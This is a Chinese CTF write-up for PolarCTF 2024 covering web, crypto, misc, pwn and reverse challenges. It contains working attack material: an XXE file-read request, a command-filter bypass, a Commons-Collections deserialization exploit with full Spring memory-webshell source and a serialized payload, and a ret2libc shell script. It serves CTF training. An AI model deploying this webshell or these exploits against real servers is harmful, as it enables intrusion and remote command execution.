PolarCTF 2024夏季个人挑战赛 个人WP

【WEB】审计

直接给源码,php特性

image-20240601145629186

秒了,有个特殊的东西 0e215962017,他md5后的值是本身

image-20240601145844287

【WEB】扫扫看

敏感目录flag.php

image-20240601165456018

image-20240601165445400

【WEB】debudao

查看网页源码(里面的flag是错的)

image-20240601170609847

查看网络

image-20240601170624340

【WEB】ExX?

开题

image-20240601144211968

扫一下,敏感目录如下

/dom.php

image-20240601144504135

DOM和题目名字ExX,联想XXE漏洞

参考:Vulhub-XXE&Bind OOB XXE 复现(超级详细) - Erichas - 博客园 (cnblogs.com)

GET /dom.php HTTP/1.1
Host: 37550f88-4046-492a-94e8-d3e6e34e774a.www.polarctf.com:8090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 230<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]><user><name>&xxe;</name></user>

image-20240601174130763

image-20240601174155155

【WEB】你知道sys还能这样玩吗

开局403

image-20240601183811120

扫不到敏感目录,最后猜到sys.php

直接给了源码,全是过滤。可以通过两个引号绕过对命令的过滤,但是过滤了点就很难受。

image-20240601183849484

php极限绕过一波

cmd=php -r 'system(hex2bin(ff3b746163202f666c61672e747874));'

image-20240601183909795

为什么前面要加ff可以看我的国赛wp:第十七届全国大学生信息安全竞赛 CISCN 2024 创新实践能力赛初赛 Web方向 部分题解WP_2024ciscn wp-CSDN博客

image-20240601184025322

做的时候感觉cmd=gr''ep -rl "lag" /应该也可以,但是加载了好久出不来。

【WEB】Dragon

flag在cookie里面???

image-20240601150105866

【WEB】CC链

CC6,无过滤,不出网打内存🐎

EXP:

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;public class CC6WithTp {public static void main(String[] args) throws Exception {TemplatesImpl templates = new TemplatesImpl();Class ct = templates.getClass();byte[] code = Files.readAllBytes(Paths.get("SpringControllerMemShell3.class"));byte[][] bytes = {code};Field ctDeclaredField = ct.getDeclaredField("_bytecodes");ctDeclaredField.setAccessible(true);ctDeclaredField.set(templates,bytes);Field nameField = ct.getDeclaredField("_name");nameField.setAccessible(true);nameField.set(templates,"Jay17");Field tfactory = ct.getDeclaredField("_tfactory");tfactory.setAccessible(true);tfactory.set(templates,new TransformerFactoryImpl());Transformer[] transformers = new Transformer[]{new ConstantTransformer(templates),new InvokerTransformer("newTransformer",null,null)};ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);Map<Object,Object> map = new HashMap<>();Map<Object,Object> lazyMap = LazyMap.decorate(map,new ConstantTransformer(1));TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,"aaa");
//
//        //查看构造函数,传入的key和valueHashMap<Object, Object> map1 = new HashMap<>();
        //map的固定语法,必须要put进去,这里的put会将链子连起来,触发命令执行map1.put(tiedMapEntry, "bbb");lazyMap.remove("aaa");Class c = LazyMap.class;Field factoryField = c.getDeclaredField("factory");factoryField.setAccessible(true);factoryField.set(lazyMap,chainedTransformer);//serialize(map1);//unserialize("ser.bin");}public static void serialize(Object obj) throws IOException {ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("./ser.bin"));objectOutputStream.writeObject(obj);}public static Object unserialize(String filename) throws IOException, ClassNotFoundException {ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));Object object = objectInputStream.readObject();return object;}
}
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;
import java.lang.reflect.Method;/*** 适用于 SpringMVC+Tomcat的环境,以及Springboot 2.x 环境.*   因此比 SpringControllerMemShell.java 更加通用*   Springboot 1.x 和 3.x 版本未进行测试*/
@Controller
public class SpringControllerMemShell3 extends AbstractTranslet {public SpringControllerMemShell3() {try {WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);Method method2 = SpringControllerMemShell3.class.getMethod("test");RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();Method getMappingForMethod = mappingHandlerMapping.getClass().getDeclaredMethod("getMappingForMethod", Method.class, Class.class);getMappingForMethod.setAccessible(true);RequestMappingInfo info =(RequestMappingInfo) getMappingForMethod.invoke(mappingHandlerMapping, method2, SpringControllerMemShell3.class);SpringControllerMemShell3 springControllerMemShell = new SpringControllerMemShell3("aaa");mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);} catch (Exception e) {}}@Overridepublic void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}@Overridepublic void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {}public SpringControllerMemShell3(String aaa) {}@RequestMapping("/malicious")public void test() throws IOException {HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();try {String arg0 = request.getParameter("cmd");PrintWriter writer = response.getWriter();if (arg0 != null) {String o = "";ProcessBuilder p;if (System.getProperty("os.name").toLowerCase().contains("win")) {p = new ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});} else {p = new ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});}java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");o = c.hasNext() ? c.next() : o;c.close();writer.write(o);writer.flush();writer.close();} else {response.sendError(404);}} catch (Exception e) {}}
}

payload:

/read
POST:obj=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwdAADYWFhc3IAKm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5tYXAuTGF6eU1hcG7llIKeeRCUAwABTAAHZmFjdG9yeXQALExvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNoYWluZWRUcmFuc2Zvcm1lcjDHl%2BwoepcEAgABWwANaVRyYW5zZm9ybWVyc3QALVtMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwdXIALVtMb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLlRyYW5zZm9ybWVyO71WKvHYNBiZAgAAeHAAAAACc3IAO29yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5Db25zdGFudFRyYW5zZm9ybWVyWHaQEUECsZQCAAFMAAlpQ29uc3RhbnRxAH4AA3hwc3IAOmNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwJV0%2FBbqyrMwMABkkADV9pbmRlbnROdW1iZXJJAA5fdHJhbnNsZXRJbmRleFsACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAP%2F%2F%2F%2F91cgADW1tCS%2F0ZFWdn2zcCAAB4cAAAAAF1cgACW0Ks8xf4BghU4AIAAHhwAAAVtMr%2Bur4AAAA0APQKADsAfgoAfwCACACBCwCCAIMHAIQHAIULAAUAhgcAhwgAYwcAiAoACgCJBwCKBwCLCgAMAIwKABQAjQgASQcAjgoACgCPCgARAJAHAJEKABEAkgcAkwgAYQoACACUCgAGAJUHAJYHAJcKABsAmAoAGwCZCACaCwCbAJwLAJ0AnggAnwgAoAoAoQCiCgAoAKMIAKQKACgApQcApgcApwgAqAgAqQoAJwCqCACrCACsBwCtCgAnAK4KAK8AsAoALgCxCACyCgAuALMKAC4AtAoALgC1CgAuALYKALcAuAoAtwC5CgC3ALYLAJ0AugcAuwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAdjb250ZXh0AQA3TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0OwEAFW1hcHBpbmdIYW5kbGVyTWFwcGluZwEAVExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L212Yy9tZXRob2QvYW5ub3RhdGlvbi9SZXF1ZXN0TWFwcGluZ0hhbmRsZXJNYXBwaW5nOwEAB21ldGhvZDIBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAAm1zAQBOTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb247AQATZ2V0TWFwcGluZ0Zvck1ldGhvZAEABGluZm8BAD9Mb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbzsBABhzcHJpbmdDb250cm9sbGVyTWVtU2hlbGwBABtMU3ByaW5nQ29udHJvbGxlck1lbVNoZWxsMzsBAAR0aGlzAQANU3RhY2tNYXBUYWJsZQcAhwcAlgEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwC8AQAQTWV0aG9kUGFyYW1ldGVycwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQADYWFhAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEdGVzdAEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEAAW8BAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEABGFyZzABAAZ3cml0ZXIBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAdyZXF1ZXN0AQAnTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7AQAIcmVzcG9uc2UBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7BwC9BwC%2BBwCnBwC%2FBwCmBwCtBwDAAQAZUnVudGltZVZpc2libGVBbm5vdGF0aW9ucwEAOExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1hcHBpbmc7AQAFdmFsdWUBAAovbWFsaWNpb3VzAQAKU291cmNlRmlsZQEAHlNwcmluZ0NvbnRyb2xsZXJNZW1TaGVsbDMuamF2YQEAK0xvcmcvc3ByaW5nZnJhbWV3b3JrL3N0ZXJlb3R5cGUvQ29udHJvbGxlcjsMADwAPQcAwQwAwgDDAQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwDEDADFAMYBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAUm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9hbm5vdGF0aW9uL1JlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMAMcAyAEAGVNwcmluZ0NvbnRyb2xsZXJNZW1TaGVsbDMBAA9qYXZhL2xhbmcvQ2xhc3MMAMkAygEATG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL2NvbmRpdGlvbi9SZXF1ZXN0TWV0aG9kc1JlcXVlc3RDb25kaXRpb24BADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ldGhvZAwAPADLDADMAM0BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QMAM4AygwAzwDQAQAQamF2YS9sYW5nL09iamVjdAwA0QDSAQA9b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9tdmMvbWV0aG9kL1JlcXVlc3RNYXBwaW5nSW5mbwwAPABgDADTANQBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQBAb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9yZXF1ZXN0L1NlcnZsZXRSZXF1ZXN0QXR0cmlidXRlcwwA1QDWDADXANgBAANjbWQHAL0MANkA2gcAvgwA2wDcAQAAAQAHb3MubmFtZQcA3QwA3gDaDADfAOABAAN3aW4MAOEA4gEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMADwA4wEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDADkAOUHAOYMAOcA6AwAPADpAQACXEEMAOoA6wwA7ADtDADuAOAMAO8APQcAvwwA8ABgDADxAD0MAPIA8wEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBABNqYXZhL2lvL1ByaW50V3JpdGVyAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAlKExqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBADsoW0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9iaW5kL2Fubm90YXRpb24vUmVxdWVzdE1ldGhvZDspVgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwEAEWdldERlY2xhcmVkTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA9yZWdpc3Rlck1hcHBpbmcBAG4oTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvbXZjL21ldGhvZC9SZXF1ZXN0TWFwcGluZ0luZm87TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDspVgEACmdldFJlcXVlc3QBACkoKUxqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEAC2dldFJlc3BvbnNlAQAqKClMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7AQAMZ2V0UGFyYW1ldGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEABWZsdXNoAQAJc2VuZEVycm9yAQAEKEkpVgAhAAgAOwAAAAAABQABADwAPQABAD4AAAFKAAYACAAAAIgqtwABuAACEgMDuQAEAwDAAAVMKxIGuQAHAgDAAAZNEggSCQO9AAq2AAtOuwAMWQO9AA23AA46BCy2AA8SEAW9AApZAxIRU1kEEgpTtgASOgUZBQS2ABMZBSwFvQAUWQMtU1kEEghTtgAVwAAWOga7AAhZEhe3ABg6BywZBhkHLbYAGacABEyxAAEABACDAIYAGgADAD8AAAA6AA4AAAAdAAQAHwATACAAHwAhACsAIgA4ACQAUQAlAFcAJgBnACcAbwApAHoAKgCDAC0AhgArAIcALgBAAAAAUgAIABMAcABBAEIAAQAfAGQAQwBEAAIAKwBYAEUARgADADgASwBHAEgABABRADIASQBGAAUAbwAUAEoASwAGAHoACQBMAE0ABwAAAIgATgBNAAAATwAAABAAAv8AhgABBwBQAAEHAFEAAAEAUgBTAAMAPgAAAD8AAAADAAAAAbEAAAACAD8AAAAGAAEAAAAzAEAAAAAgAAMAAAABAE4ATQAAAAAAAQBUAFUAAQAAAAEAVgBXAAIAWAAAAAQAAQBZAFoAAAAJAgBUAAAAVgAAAAEAUgBbAAMAPgAAAEkAAAAEAAAAAbEAAAACAD8AAAAGAAEAAAA4AEAAAAAqAAQAAAABAE4ATQAAAAAAAQBUAFUAAQAAAAEAXABdAAIAAAABAF4AXwADAFgAAAAEAAEAWQBaAAAADQMAVAAAAFwAAABeAAAAAQA8AGAAAgA%2BAAAAPQABAAIAAAAFKrcAAbEAAAACAD8AAAAKAAIAAAA6AAQAOwBAAAAAFgACAAAABQBOAE0AAAAAAAUAYQBiAAEAWgAAAAUBAGEAAAABAGMAPQADAD4AAAHXAAYACAAAAM24AALAABvAABu2ABxMuAACwAAbwAAbtgAdTSsSHrkAHwIATiy5ACABADoELcYAkxIhOgUSIrgAI7YAJBIltgAmmQAhuwAnWQa9AChZAxIpU1kEEipTWQUtU7cAKzoGpwAeuwAnWQa9AChZAxIsU1kEEi1TWQUtU7cAKzoGuwAuWRkGtgAvtgAwtwAxEjK2ADM6BxkHtgA0mQALGQe2ADWnAAUZBToFGQe2ADYZBBkFtgA3GQS2ADgZBLYAOacADCwRAZS5ADoCAKcABE6xAAEAGgDIAMsAGgADAD8AAABSABQAAAA%2FAA0AQAAaAEIAIwBDACsARAAvAEUAMwBHAEMASABhAEoAfABMAJIATQCmAE4AqwBPALIAUAC3AFEAvABSAL8AUwDIAFYAywBVAMwAVwBAAAAAXAAJAF4AAwBkAGUABgAzAIkAZgBiAAUAfABAAGQAZQAGAJIAKgBnAGgABwAjAKUAaQBiAAMAKwCdAGoAawAEAAAAzQBOAE0AAAANAMAAbABtAAEAGgCzAG4AbwACAE8AAAA2AAj%2FAGEABgcAUAcAcAcAcQcAcgcAcwcAcgAA%2FAAaBwB0%2FAAlBwB1QQcAcvgAGvkACEIHAFEAAFgAAAAEAAEAdgB3AAAADgABAHgAAQB5WwABcwB6AAIAewAAAAIAfAB3AAAABgABAH0AAHB0AARDaHUwcHcBAHhzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo%2F2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWVxAH4AFFsAC2lQYXJhbVR5cGVzcQB%2BABN4cHB0AA5uZXdUcmFuc2Zvcm1lcnBzcQB%2BAAA%2FQAAAAAAADHcIAAAAEAAAAAB4eHQAA2JiYng%3D

image-20240601231413238

访问/malicious,GET传参cmd执行命令

image-20240601231740543

【CRYPTO】翻栅栏

给了两个附件

image-20240601142931356

image-20240601142936155

~呜嗷嗷嗷嗷呜啊嗷啊呜呜嗷呜呜~呜啊呜啊嗷啊呜嗷嗷呜~~嗷~呜呜嗷呜嗷嗷嗷嗷呜啊嗷啊嗷呜嗷呜呜~嗷啊嗷啊嗷啊呜嗷嗷嗷~~嗷~呜嗷嗷嗷嗷嗷嗷嗷呜啊嗷啊啊呜嗷呜呜啊~呜啊啊嗷啊呜~~啊啊~嗷~呜呜呜嗷啊嗷嗷嗷呜啊嗷~嗷啊

兽音

frleeah!g__si

栅栏(栏数6)

flag_is_here!

MD5 32位小

d531d5be4f3737afa979a0f77dd8b180

image-20240601143053673

image-20240601143101082

image-20240601143107538

image-20240601142857379

【CRYPTO】Hello

为了使用公钥 (n,e)=(365354477477,65537)(n,e) = (365354477477, 65537)(n,e)=(365354477477,65537) 加密消息 “HELLO”,我们将按照以下步骤操作:

  1. 将消息 “HELLO” 转换为 ASCII 码:

    • ‘H’ -> 72
    • ‘E’ -> 69
    • ‘L’ -> 76
    • ‘L’ -> 76
    • ‘O’ -> 79
  2. 将每个字符的 ASCII 码进行加密:

    对于每个 ASCII 码 mmm,使用公式 c≡memod  nc \equiv m^e \mod nc≡memodn 进行加密。

  3. 计算上述结果:

为了计算这些结果,我们需要进行模幂运算。使用 Python 代码进行计算如下:

# Given values
n = 365354477477
e = 65537# ASCII values for 'HELLO'
ascii_values = [7269767679]# Encrypt each ASCII value using the public key (n, e)
encrypted_values = [pow(m, e, n) for m in ascii_values]print(encrypted_values)
flag{124198634960}

【CRYPTO】pici

附件:

image-20240601172256812

5paw5L2b5puw77ya6Ku45q+Y6Zq45YOn6ZmN5ZC96Ku45q+Y6ZmA5q+Y5pGp5q+Y6Zq45YOn57y96Jap5q+Y6aGY5q+Y5YOn6aGY5ZKk6aGY5q+Y5rOi5Zqk5q+Y6ZeN6aGY6ZeN5q+Y5Zqk5Zia5L+u5q+Y6Zq45amG6Zq45q+Y5L+u6Kum5b2M5ZOG5oSN6IGe5q+Y5amG6aCI6aCI55y+5q+Y6I6K5b+D6ZmN55y+6Jap5q+Y5ZOG5oWn5Y+75ZKk6ZeN6aGY5YWc5q+Y5Zqk5q+Y5aaCCg==

base64解密

新佛曰:諸毘隸僧降吽諸毘陀毘摩毘隸僧缽薩毘願毘僧願咤願毘波嚤毘闍願闍毘嚤嘚修毘隸婆隸毘修諦彌哆愍聞毘婆須須眾毘莊心降眾薩毘哆慧叻咤闍願兜毘嚤毘如

佛曰在线解密

huanyinglaidaowangzherongyao

MD5 32位小加密

39c6acff08d543f5cb892bdbbdc2841f

flag:

flag{39c6acff08d543f5cb892bdbbdc2841f}

【MISC】祺贵人告发

png隐写就这么几种,先拿去stegsolve找不到东西。然后binwalk和foremost一下,找到了一个文件:

image-20240601185332663

然后我尝试了一下图片高度修改,发现底下没藏东西。

之后爆破这个压缩包密码,发现是1574。打开后发现是一段中文,但是后半段在图片里找不到:

image-20240601185348159

然后就把后半段拿去md5直接提交,发现是错的。然后整段拿去md5(32位),就是flag了

【MISC】费眼睛的flag

开题看见一个轮廓

image-20240601194942848

猜测是二维码,和ISCC的一样应该。部分单元格有加粗

image-20240601195137917

加粗换成纯黑

image-20240601201809778

flag{4d58a180010fcce87d331c9ba36e3b93}

【MISC】加点什么2.0

和1.0一样先拿下cpp

image-20240601211531047

凯撒,k为偏移值,偏移量4

image-20240601211718602

image-20240601211735973

image-20240601211748050

【PWN】format_ropx86

from pwn import *p = remote('120.46.59.242', 2080)
elf = ELF('./fmt') # 定义所需地址
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
vuln = 0x080485C1# 接收初始提示
p.recvuntil(b'name:')# 发送格式字符串漏洞载荷
payload = fmtstr_payload(4, {0x0804A030: 8})
p.send(payload)# 接收下一个提示
p.recvuntil(b'secret:')# 创建并发送第一个阶段的载荷以泄露puts地址
payload1 = b'a' * 0x108 + b'a' * 4 + p32(puts_plt) + p32(vuln) + p32(puts_got)
p.sendline(payload1)
puts_addr = u32(p.recv(4))
print(f'puts_addr = {hex(puts_addr)}')# 计算libc基地址及相关偏移
libc_base = puts_addr - 0x05f150
system = libc_base + 0x03a950
bin_sh = libc_base + 0x15912b# 创建并发送第二阶段的载荷以获取shell
payload2 = b'a' * 0x108 + b'a' * 4 + p32(system) + p32(0) + p32(bin_sh)
p.recvuntil(b'Please input your secret:')
p.sendline(payload2)p.interactive()

image-20240601210900814

【REVERSE】EasyGo

image-20240601221236705

看到关键加密encode

简单加密,接下来就是找密文了

调试半天没有发现结果就藏在里面

image-20240601221302066

解密脚本

str=[0x0000006A, 0x00000069, 0x00000071, 0x0000006E, 0x0000006E, 0x0000006B, 0x00000073, 0x00000073, 0x00000067, 0x00000068, 0x00000077, 0x00000069, 0x0000006B, 0x0000006A, 0x00000068, 0x00000067]
flag=''
for y in range(len(str)):flag+=chr((str[y]+2)^3)print(flag)
flag{ohpssnvvjizhnoij}

【REVERSE】EasyCPP2

image-20240601221516935

加单解密

str='qisngksofhuivvmg'
flag=''
for y in range(len(str)):flag+=chr((ord(str[y])+3)^1)print(flag)
flag{umwpkowshjymxxqk}

【REVERSE】往哪走

image-20240601221730213

image-20240601221740901

使用调试进到主函数

image-20240601221751978

得到flag迷宫

flag{222441144222}

【REVERSE】crc

image-20240601221918696

丢给gpt

得到flag

import zlib
import itertools
import string# Define a helper function for CRC32 computation
def compute_crc32(input_string):return format(zlib.crc32(input_string.encode()), '08x')# Define the target CRC32 values from the C code
